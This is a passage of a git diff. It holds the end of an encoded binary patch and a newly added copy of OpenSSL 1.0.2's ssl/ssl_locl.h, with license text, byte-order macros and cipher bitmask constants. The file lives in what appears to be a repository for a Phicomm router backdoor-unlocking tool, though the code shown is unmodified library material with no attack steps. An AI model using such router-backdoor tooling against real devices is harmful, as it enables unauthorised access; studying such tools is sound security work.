z>w+Dsqo%eVEkDxK!5mwp3gc)gBuB;O2-G&Wwdlw@Oxs<GiqcxA)G$wN30iGbD?U^y
z5?ZX~HJ2LSu%fLMg9w@?M_CNF=um5u!>G!-qr0a>jxxf<&B*6u8?fdlH4Q6j>T4sl
ztn^7uv**m5Rc<}c2u+tqmRW0?<uxQ8jwwtei%b;PDATk;n$lD+vpNoplxJ(h#S%+A
z4w(>;mS0`1bk{fC(9jWCv{Ka(Ne%o>oVpA#vsA)$txMb5rJK}aT1Q}3XhyiEt)n4Y
zZ`yz&x;fazg!!N9*V<}3I+h<*KaTRPiDC|`^3ztLdfjwG7%Pc2@|gM|;>i)lcqnD4
zhKcT6wOr<=)J^-DLW$?4wH-^4^x2^r{yWq_*wa^LYW0=n*Xk#RNVYiLirY9WBs`jK
zK$RattZBQR!Z)=nZdC!IZO9BvU~4gQBw7|nH!~<Pn`W2Ko?SU}hOSf`KoXM55E!J3
zEm5^-iiMa!2dN6E=HhB*j`2sP=A3e&%fpnYx%P$*H36b5XR9mmTibz|H*G?_Xsm6i
zM@PD(L8m0K6j;`ZiFRT=z=)H}1kAsw+bkC7xd<}=%UH&SvQ19$IaM^BEB>{xs^e2D
ztG)7Bs;}VOu?2l9jbd1PwqTfy-YgR$))a^qA0?acZ~`d3(RK{2W{62fXK=C+9p#4(
zs<tJOAj}Fehs3<K2J64Y4ectA7uyf$Kor!SKeC8@$k9RUSqh8zThS)`4w*Pef>L><
z3BjbMP^7AmJtd*skf=<VnLL+_R++)j=9xvVnkWZC`8V6)reu|-tm!tSjkncC8awO`
z(3a7jrdXR>QJW+fMwwbJNrwbg0!bf+qc%23v_fn4%mf}yu~ah?H24pFl4#MDVxpI*
z1gR-HfA+_E5icDyV;sVbab^e-IofLwMI@Z+Rfnn?($S_=Z#qp|pQ$v4vBX-3E-6$2
zc0^j+hnAazm)ExFd@!*@us_k>Q9CrFnVgg!cBuNs)PY=X!Yu8$;phNEpsI(eZ^0rR
z+NEci9#-8$J-Wd5R^44#i&Z7h4$E}UoYYM(pRT)R7DjT8P(E)?`HW=0J#*^p>Y7>Q
zv#Tq^N$J!hc~cAabDDJ4v6V=n;x<w4m}byNO$yZHgHM3S%tVW;t*gWO(W;~xB>d4A
zw{U`(ti?i9f8O5E)?8cHz%7hM)#pmi)Tu2OMZ#*9QOW)cTT!OA);BDQ>J^+C)oL0g
zB~4getAQ{ubIKJpi#pJ)*I~}Z?!YV*hWOBm3-r)Y)6i09j}d57YCjESq&MQs`?+j9
z^8Rxk%><_oamO<`_r4A9!95*0UsW02PYCDgc|+qsCa&0mOvry=acl)9cut1)pdP+*
zG5XK8xNRrDx22<e5&n$)LW|q-{7#n6wevT^Y3CUH89nb=^4y9xd@zmta4LYKep~)*
z;jaEm(#X$BBY#~Q`Pb6OznMn<V~d{;TTQymzb&V?oe!h40N~tol~|lx??%rs3c~U7
zb^IBAY8t-8;!`d8E{lgPevifNcz<hgThE6UxAo)<gHkwp+j{ujA|1JhKV$zn7O%8;
zg~iXX_(F?cVeuA=UvBXqTHKEJpDk|3%kL2BXr~>o`M1^NRroXZziY{dEk5iRJit-j
zwsVZdZ9B^>Zrf@8T{ZRCb~ah^ww>)3x9yBu+_v)pi`#Z?wYY8P$Q-7M{|01eea;t7
zJHLTHlRtATUTg6hi!ZYHFVg6L$db49zi#n5OV8Bdcz~llcK+}?EIOCJn}(k~BDMUt
z)9_!W;S1yi5%Y~ACVxH|mDJy1ar5sGjeNBh3*_VdGac<;fj^_?s}?V^_{A2#(c<5<
zxIHecw79M3hZeW<^EHdxdiGn~)-yaGM!>oGKi}fEd~+Iplf~_HJ!J7!h{xnlKHito
zG2YeqGkmhe?Rc-WxUK(x2xqyltG*6@biZ(TLO%y-I5)ksEFOcuk*~3Mm&KP`{7j2~
z-{RdC-(zvRye4pR0O#8CEsM9p-`I19#ce$gSo~H?zR%)oEWX#`Yb}1n;=aW{;$R6!
zI}7n=?0HaLkdoW^&?}tfVvn=iE&1<RdXAItHeEd@33v4bEqPndYiZ>FXvy3C)#nz!
z%eF^8q@q0=EPlGhe_-+RE&fA`UuN<DY4Iy9Zs+s0Y4|rSUT5jKS@^kNcU$~Bmi#>y
zUvJ6($l^atBmbzyZ95NG+%ET%<-;-Nn_WMPEWXi-x5DDK{5;`qxi7Nh?Q*~3Bq)Vr
zy!YbI)Xz;8|7VLoYVn^~{59c>mrd5_*=KP!5yKB!dhGso#8)5$M|<pk?0AcBf}hcI
zu5iZ7CSv&cmi$jGKF8u`SbU+ShgI9?X|UvNJzbVOi`2;bY2@#-c+8UjSBu|g@wYAh
zzbyWhlkot@{Mn2@6Yr%K|Cz<FO2eClGvDlf=3YzQt|!l?k$)|X{9i0?*Yj~>5g{Dy
zxAT9J#s3L@CS9kULTN4k5Uz%Q)8Y?X{2q%xV)6IV@Dopk5FG8X<=4n}zvREdpNaP?
zK|H{@_P-xgSn;j6HS!}**WAtLvBIgx?pMn!{)D9`YVjv6K9QLSM?FvD&&1ne@n<aV
zr{SB@@GTbKVd?p+#h<bG2o^RR?Xmf3X?Ux}snXcrmxjNchG!Qt)}zbi1mT(RV;5-j
z7h0TMk>M9uoK4X1DHdndHhhl7?fz|n#aXqD{7T{3VE=0IZi_RCM*d!l+wwoRxGjJE
zSqKbA{lCGV(bH)0N{g?x_{$c*$Kqj&|BJ=1u=q<Bx6ARM#b2@H2Q6;Ld+yl~f}{O5
zzu4lxgP%#)vljn@#n0oQ0!KY{_%rgC31@v^mtc6M#m88DhNb6ii{E1LLW{qcM$gNZ
zyxrd4wYc5y9pT^yNBjRL{*0Zg&LP!2BO}Q-TRh9+y%x9o6Y~$DsNXKHDo%*t$g?dy
z*I9fI{ER(~7RTp~2_8wqKNHUUxAQsUYXESJ*Uq1>So|*dnRv%r{0A1FVsX3v%(S>&
ze;O=q??<gn!`E2c&Yuky_bq#VmWDrJal5?wEpC_Bix#)@|8<Mo`Tt%Te%Ru6yBN+*
zNjT=e-Jg8L;&%P~n#FDT%Z0O;kFn~*R7?II_?dFN+LGsg+-vxPH1f?Bx8ucsGoqYp
z|2j+m-B!HoEqU9XM=WlqcbCQOcz<VcyWGz_FKLh6z9tHH>;L7Jygl#wp2h!Q+5cBd
z52r9D--eCX@w)m)2xtDhZOK<ye3QkOT70-wF0nNF@3rLZ_WOJq`O)WVJ86$CKTWu6
z|CN@!oj*Uf<b#&|&sp-Bmi_xIZqK*>-QvS6`C-LLJI}E6f7RlAH(~O>#^MVt`SliO
z+c5G!vv{4wAF=o!EPlx1trpKI!2=xg)8^l>_*L*T@itm~p2dG|@sU=#{>|cHOaAX^
z`1dA22#)sH^=FI4`G1cXdv>PbZ>Qm(TijkJj<`TYtKz*8w?_X77U%zJZTJ}$&$amZ
z7PtG2GK<^wWQE1;{<+KIcK>|8#q+FqKe4#2ConOYE?dvp7Ux+tCSBKB+?M}_#d$uo
zk&jyZ1dC7C(H=D}G+VsT%I7Pxl6JC)jQ;s)_%|(np(W4rMd(<6Z2nz~m%`8J|6v;b
zjKwdr<gYju4{+2!3x7t>x6<%U7Qfb#pFSK9aMaU)KcnYYY54NvD6QoqxElG7xQPHq
zJ!j(2@O4}~z>(YWZnXFo_!;>vX?Xl}YSDT&;A-SEta;`;7SFZ#pDf;L@jqL9mBkNQ
z{0@tMWbrK)xApW{+}5+#;<lcB*7$4Z+rL=#`72g^h6&1XeBqz^kLPh^{?Zx#=1BdV
zqb~`5|0oUQlHk7(knhO<O86LuKPsGSQaTf_`j3wAEXA1M>c4UU58{u`$nOw43pGyg
z7lli<CHTKeyyG1C7lao({3YR%oe4eWJPx)&I%ChjiTtG+CpiCIFkPAYP0GJ5JnZm4
z3HKa6Rd|)dX9}-&_#)wR9NsSNaGt|g3BS(aYlSa#`1gd@JDmSsn66P@68Z2G;mr<z
zP<Wfe9}ymL_|w8yIQ)6xH#z(@;hheDS9q7h{~~;?!%xiB;5LV^6u!>kHw(Yh;j4vj
zaCo=yyB+Qe-{|lj;hP-ZBKB`~__u{W=<r_(-{SBmg+J`@XNC7V{MW*tbokH2&OV3#
zT=-6h|BLY54u3@Wa}Mv7c=tMdr|_2@9uqyUI{aDTZ#aC9@O=*Fzt^UFM_&^4{MW+w
zJNy;l?>qc8;RhZ5d*Por{13tpJN#YYpF8}3aL$G3On>!(aIWQT{uklqyCWn2sc_C+
zZTY_n&v*D2!p;B1Vf19=>F@=P{4n8T9X?!m(Ba1kFLd~5;YAKVLHIa_pCp|BMVOtg
zQ-n`+`02vc|9XW0CS9i9Uh2sIR`Q|D;pd5-u)|A)dk())IL}SA?VKdM+ToW8pX2b5
z@Ocg|7k-_?D}^s~_;lg*4!=rxqr>M4Z+7^#!rL5vz3_;`YlW|Hc!Thp9Nr|n)8R{n
zcRBo9!q+-HD*QHwuN1z{;l}<u9o{PPx)gclY9J6a54h&Yz032{@Pafvn1&an;iYN#
z!Zf@w4PR?<E(OeZ5EO3Oi#(d;U7{VC^jA6ZvV9teIQ%MkHt`z$%Y<)s<hd75*Qb7y
z?KdRl<c<sG{7|=lHs^=B{g^o?v`q9Fd(1hZZhJBRF5j)sGi3ed*0*m6-{|P)d6jez
zJNy>myB&VJ@HZU(BjE=fe!p;@drD{0WzOp?aJV^_Gwg74{wDuhP+N~Vf3w-)=KRer
zhu@d2!*6i7IZtzo!_9e`Z#bOiBGTnZ`smF+bKd1dhnw>*J%^j~F0XUAIq$N~;pV){
zE{B_QEjKvaoNM`@!_B#tJO`A{*l*6YeA(gVT+96qH|JV@?r?K{WxnLM(QnSL<hh=9
zyypB$Q=UfNoL@P|kvHd5Hags#Q+cPu&H0iKJKUTj`Le^!Ig<MwZqAW3M`s&5%{h_<
zQZEcQ=SY@1+?*p>?QnCBWWB@9Ig%?JZqAXs&Ee)8$;}Qo=SV*3aC462UWc1?>wbru
zb0I%>xH%Ux|CpiWYt9WXbhtS$vee<`yvQntoAV+UI^3KWd7Hz{xsaP2Zq9{#(&6S@
z$ZXlaGUaH_f2?x2Ip@)|10!$FPkhjkH|HnzIlOI*&aWI9$c!Fye&Se%oAVQk9d6D~
z3_IMMpV;Pbb57#j4mal{ZgIFdCvm64%{hs$I^3L-__@Q)IfF&A?`P6$&fUAz;pW`E
zYKNP1_v#&P&fQz#aC7e7Z4Ni*?rn6qIbZK#hnw^DMvWL+&&|1br4Bde;#E8RvY-xs
zlf&;4zT4%eYxy@EZqBni=x}qMT~PM7Og@|Q?5Z4o<(XQ4v%}3fbUcrc&ge1c(B18D
za}M3Z4man}?RI#5q1OA3!_9efhaLWk$d4MO!x?+bd2>OBoAc%-I^3K$=Q-S*H+P-G
z&3SWe4man`ZFaahCvK<1&3SOII^3KG_rAl;d2j*QpD^h)=fRC}xH%7w=K|6hd2=4z
zr4Bde!BsoloCjC$aC08qI)|I{-8MPgoa1KpU5q{Eytd~Yd2?RdK8Kt0+CFi3;=DFl
zHyi!tytc6pH|Mn#JKUVtR^@PWE*sDJv-8uOzZP-0IcII1!_7Hsn;dS=S?hJUIcM!T
zhnsWO_Bq^~vz8<4MUxNaoVBqIH|MMsJKUVJ7IwHfXKkLt%{gn$4manlbvoRfvv#M$
z%{gmZ9B$52d(PqJe6)iOH|L#=l?AZL2Xn63JcpZe$080l=Z^9GJiFY@xnr9hK6;{-
z>vOm{cWj@-%{gM9INY2gmNR;2yyhISu?{!qhy})XtXvwYU4(0-U0)l`U3)`w?Ra(g
z)Ohvpa>p;~=m?B&Z{-8UOUC15EhVIxJScDA@%%^2&4KYatzjwt9eQAVOKYTIJpOax
z^VIQC@_a)}bUe=bXv1*_D@8#A53b-@A^!y~2pwEv%Cs$^u}tnBk^DCvvK%#!fs=8^
zDScUj=$p0``uZwA4uNBJVpy5BsBa<3&lWDr9U|@c(iN^(UlPB;#GSqwhYNMO;d>>#
zBd%<)89yJOU3^z;I}`r5HpIP2zqytRV|%dOx{LJF1|uk*viwPimf<c{{(1b^3~rsw
zlbC-jBRBu}?wC=y=`WLwq;>GKUC@5O{dD}LivQJ(TJWI0sPbdnZv2bD7=N+Inaf^@
z|7!-w)ntdcE&(_9w&>p_yv=y;%JLfvPW|2d4@{zTAP`i)$sc3CA>YRhb-Lk$5}xN|
z+RhDsJ3Le6-|l;LC^HVQ{5Zs#@CDjCW!&`guFwL#@*O_AvmpN5@T?wg*#pUc>>CIy
bIbJ;_ewbF<F?p%NAKs#+_-&f)-0=Sg;J)^s

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_locl.h
new file mode 100644
index 0000000..46ea18a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_locl.h
@@ -0,0 +1,1479 @@
+/* ssl/ssl_locl.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * ECC cipher suite support in OpenSSL originally developed by
+ * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright 2005 Nokia. All rights reserved.
+ *
+ * The portions of the attached software ("Contribution") is developed by
+ * Nokia Corporation and is licensed pursuant to the OpenSSL open source
+ * license.
+ *
+ * The Contribution, originally written by Mika Kousa and Pasi Eronen of
+ * Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
+ * support (see RFC 4279) to OpenSSL.
+ *
+ * No patent licenses or other rights except those expressly stated in
+ * the OpenSSL open source license shall be deemed granted or received
+ * expressly, by implication, estoppel, or otherwise.
+ *
+ * No assurances are provided by Nokia that the Contribution does not
+ * infringe the patent or other intellectual property rights of any third
+ * party or that the license provides you with all the necessary rights
+ * to make use of the Contribution.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
+ * ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
+ * SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
+ * OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
+ * OTHERWISE.
+ */
+
+#ifndef HEADER_SSL_LOCL_H
+# define HEADER_SSL_LOCL_H
+# include <stdlib.h>
+# include <time.h>
+# include <string.h>
+# include <errno.h>
+
+# include "e_os.h"
+
+# include <openssl/buffer.h>
+# ifndef OPENSSL_NO_COMP
+#  include <openssl/comp.h>
+# endif
+# include <openssl/bio.h>
+# include <openssl/stack.h>
+# ifndef OPENSSL_NO_RSA
+#  include <openssl/rsa.h>
+# endif
+# ifndef OPENSSL_NO_DSA
+#  include <openssl/dsa.h>
+# endif
+# include <openssl/err.h>
+# include <openssl/ssl.h>
+# include <openssl/symhacks.h>
+
+# ifdef OPENSSL_BUILD_SHLIBSSL
+#  undef OPENSSL_EXTERN
+#  define OPENSSL_EXTERN OPENSSL_EXPORT
+# endif
+
+# undef PKCS1_CHECK
+
+# define c2l(c,l)        (l = ((unsigned long)(*((c)++)))     , \
+                         l|=(((unsigned long)(*((c)++)))<< 8), \
+                         l|=(((unsigned long)(*((c)++)))<<16), \
+                         l|=(((unsigned long)(*((c)++)))<<24))
+
+/* NOTE - c is not incremented as per c2l */
+# define c2ln(c,l1,l2,n) { \
+                        c+=n; \
+                        l1=l2=0; \
+                        switch (n) { \
+                        case 8: l2 =((unsigned long)(*(--(c))))<<24; \
+                        case 7: l2|=((unsigned long)(*(--(c))))<<16; \
+                        case 6: l2|=((unsigned long)(*(--(c))))<< 8; \
+                        case 5: l2|=((unsigned long)(*(--(c))));     \
+                        case 4: l1 =((unsigned long)(*(--(c))))<<24; \
+                        case 3: l1|=((unsigned long)(*(--(c))))<<16; \
+                        case 2: l1|=((unsigned long)(*(--(c))))<< 8; \
+                        case 1: l1|=((unsigned long)(*(--(c))));     \
+                                } \
+                        }
+
+# define l2c(l,c)        (*((c)++)=(unsigned char)(((l)    )&0xff), \
+                         *((c)++)=(unsigned char)(((l)>> 8)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>16)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>24)&0xff))
+
+# define n2l(c,l)        (l =((unsigned long)(*((c)++)))<<24, \
+                         l|=((unsigned long)(*((c)++)))<<16, \
+                         l|=((unsigned long)(*((c)++)))<< 8, \
+                         l|=((unsigned long)(*((c)++))))
+
+# define l2n(l,c)        (*((c)++)=(unsigned char)(((l)>>24)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>16)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>> 8)&0xff), \
+                         *((c)++)=(unsigned char)(((l)    )&0xff))
+
+# define l2n6(l,c)       (*((c)++)=(unsigned char)(((l)>>40)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>32)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>24)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>16)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>> 8)&0xff), \
+                         *((c)++)=(unsigned char)(((l)    )&0xff))
+
+# define l2n8(l,c)       (*((c)++)=(unsigned char)(((l)>>56)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>48)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>40)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>32)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>24)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>16)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>> 8)&0xff), \
+                         *((c)++)=(unsigned char)(((l)    )&0xff))
+
+# define n2l6(c,l)       (l =((BN_ULLONG)(*((c)++)))<<40, \
+                         l|=((BN_ULLONG)(*((c)++)))<<32, \
+                         l|=((BN_ULLONG)(*((c)++)))<<24, \
+                         l|=((BN_ULLONG)(*((c)++)))<<16, \
+                         l|=((BN_ULLONG)(*((c)++)))<< 8, \
+                         l|=((BN_ULLONG)(*((c)++))))
+
+/* NOTE - c is not incremented as per l2c */
+# define l2cn(l1,l2,c,n) { \
+                        c+=n; \
+                        switch (n) { \
+                        case 8: *(--(c))=(unsigned char)(((l2)>>24)&0xff); \
+                        case 7: *(--(c))=(unsigned char)(((l2)>>16)&0xff); \
+                        case 6: *(--(c))=(unsigned char)(((l2)>> 8)&0xff); \
+                        case 5: *(--(c))=(unsigned char)(((l2)    )&0xff); \
+                        case 4: *(--(c))=(unsigned char)(((l1)>>24)&0xff); \
+                        case 3: *(--(c))=(unsigned char)(((l1)>>16)&0xff); \
+                        case 2: *(--(c))=(unsigned char)(((l1)>> 8)&0xff); \
+                        case 1: *(--(c))=(unsigned char)(((l1)    )&0xff); \
+                                } \
+                        }
+
+# define n2s(c,s)        ((s=(((unsigned int)(c[0]))<< 8)| \
+                            (((unsigned int)(c[1]))    )),c+=2)
+# define s2n(s,c)        ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
+                          c[1]=(unsigned char)(((s)    )&0xff)),c+=2)
+
+# define n2l3(c,l)       ((l =(((unsigned long)(c[0]))<<16)| \
+                             (((unsigned long)(c[1]))<< 8)| \
+                             (((unsigned long)(c[2]))    )),c+=3)
+
+# define l2n3(l,c)       ((c[0]=(unsigned char)(((l)>>16)&0xff), \
+                          c[1]=(unsigned char)(((l)>> 8)&0xff), \
+                          c[2]=(unsigned char)(((l)    )&0xff)),c+=3)
+
+/* LOCAL STUFF */
+
+# define SSL_DECRYPT     0
+# define SSL_ENCRYPT     1
+
+# define TWO_BYTE_BIT    0x80
+# define SEC_ESC_BIT     0x40
+# define TWO_BYTE_MASK   0x7fff
+# define THREE_BYTE_MASK 0x3fff
+
+# define INC32(a)        ((a)=((a)+1)&0xffffffffL)
+# define DEC32(a)        ((a)=((a)-1)&0xffffffffL)
+# define MAX_MAC_SIZE    20     /* up from 16 for SSLv3 */
+
+/*
+ * Define the Bitmasks for SSL_CIPHER.algorithms.
+ * This bits are used packed as dense as possible. If new methods/ciphers
+ * etc will be added, the bits a likely to change, so this information
+ * is for internal library use only, even though SSL_CIPHER.algorithms
+ * can be publicly accessed.
+ * Use the according functions for cipher management instead.
+ *
+ * The bit mask handling in the selection and sorting scheme in
+ * ssl_create_cipher_list() has only limited capabilities, reflecting
+ * that the different entities within are mutually exclusive:
+ * ONLY ONE BIT PER MASK CAN BE SET AT A TIME.
+ */
+
+/* Bits for algorithm_mkey (key exchange algorithm) */
+/* RSA key exchange */
+# define SSL_kRSA                0x00000001L
+/* DH cert, RSA CA cert */
+# define SSL_kDHr                0x00000002L
+/* DH cert, DSA CA cert */
+# define SSL_kDHd                0x00000004L
+/* tmp DH key no DH cert */
+# define SSL_kEDH                0x00000008L
+/* forward-compatible synonym */
+# define SSL_kDHE                SSL_kEDH
+/* Kerberos5 key exchange */
+# define SSL_kKRB5               0x00000010L
+/* ECDH cert, RSA CA cert */
+# define SSL_kECDHr              0x00000020L
+/* ECDH cert, ECDSA CA cert */
+# define SSL_kECDHe              0x00000040L
+/* ephemeral ECDH */
+# define SSL_kEECDH              0x00000080L
+/* forward-compatible synonym */
+# define SSL_kECDHE              SSL_kEECDH
+/* PSK */
+# define SSL_kPSK                0x00000100L
+/* GOST key exchange */
+# define SSL_kGOST       0x00000200L
+/* SRP */
+# define SSL_kSRP        0x00000400L
+
+/* Bits for algorithm_auth (server authentication) */
+/* RSA auth */
+# define SSL_aRSA                0x00000001L
+/* DSS auth */
+# define SSL_aDSS                0x00000002L
+/* no auth (i.e. use ADH or AECDH) */
+# define SSL_aNULL               0x00000004L
+/* Fixed DH auth (kDHd or kDHr) */
+# define SSL_aDH                 0x00000008L
+/* Fixed ECDH auth (kECDHe or kECDHr) */
+# define SSL_aECDH               0x00000010L
+/* KRB5 auth */
+# define SSL_aKRB5               0x00000020L
+/* ECDSA auth*/
+# define SSL_aECDSA              0x00000040L
+/* PSK auth */
+# define SSL_aPSK                0x00000080L
+/* GOST R 34.10-94 signature auth */
+# define SSL_aGOST94                             0x00000100L
+/* GOST R 34.10-2001 signature auth */
+# define SSL_aGOST01                     0x00000200L
+/* SRP auth */
+# define SSL_aSRP                0x00000400L
+
+/* Bits for algorithm_enc (symmetric encryption) */
+# define SSL_DES                 0x00000001L
+# define SSL_3DES                0x00000002L
+# define SSL_RC4                 0x00000004L
+# define SSL_RC2                 0x00000008L
+# define SSL_IDEA                0x00000010L
+# define SSL_eNULL               0x00000020L
+# define SSL_AES128              0x00000040L
+# define SSL_AES256              0x00000080L
+# define SSL_CAMELLIA128         0x00000100L
+# define SSL_CAMELLIA256         0x00000200L
+# define SSL_eGOST2814789CNT     0x00000400L
+# define SSL_SEED                0x00000800L
+# define SSL_AES128GCM           0x00001000L
+# define SSL_AES256GCM           0x00002000L
+
+# define SSL_AES                 (SSL_AES128|SSL_AES256|SSL_AES128GCM|SSL_AES256GCM)
+# define SSL_CAMELLIA            (SSL_CAMELLIA128|SSL_CAMELLIA256)
+
+/* Bits for algorithm_mac (symmetric authentication) */
+
+# define SSL_MD5                 0x00000001L
+# define SSL_SHA1                0x00000002L
+# define SSL_GOST94      0x00000004L
+# define SSL_GOST89MAC   0x00000008L
+# define SSL_SHA256              0x00000010L
+# define SSL_SHA384              0x00000020L
+/* Not a real MAC, just an indication it is part of cipher */
+# define SSL_AEAD                0x00000040L
+
+/* Bits for algorithm_ssl (protocol version) */
+# define SSL_SSLV2               0x00000001L
+# define SSL_SSLV3               0x00000002L
+# define SSL_TLSV1               SSL_SSLV3/* for now */
+# define SSL_TLSV1_2             0x00000004L
+
+/* Bits for algorithm2 (handshake digests and other extra flags) */
+
+# define SSL_HANDSHAKE_MAC_MD5 0x10
+# define SSL_HANDSHAKE_MAC_SHA 0x20
+# define SSL_HANDSHAKE_MAC_GOST94 0x40
+# define SSL_HANDSHAKE_MAC_SHA256 0x80
+# define SSL_HANDSHAKE_MAC_SHA384 0x100
+# define SSL_HANDSHAKE_MAC_DEFAULT (SSL_HANDSHAKE_MAC_MD5 | SSL_HANDSHAKE_MAC_SHA)
+
+/*
+ * When adding new digest in the ssl_ciph.c and increment SSM_MD_NUM_IDX make
+ * sure to update this constant too
+ */
+# define SSL_MAX_DIGEST 6
+
+# define TLS1_PRF_DGST_MASK      (0xff << TLS1_PRF_DGST_SHIFT)
+
+# define TLS1_PRF_DGST_SHIFT 10
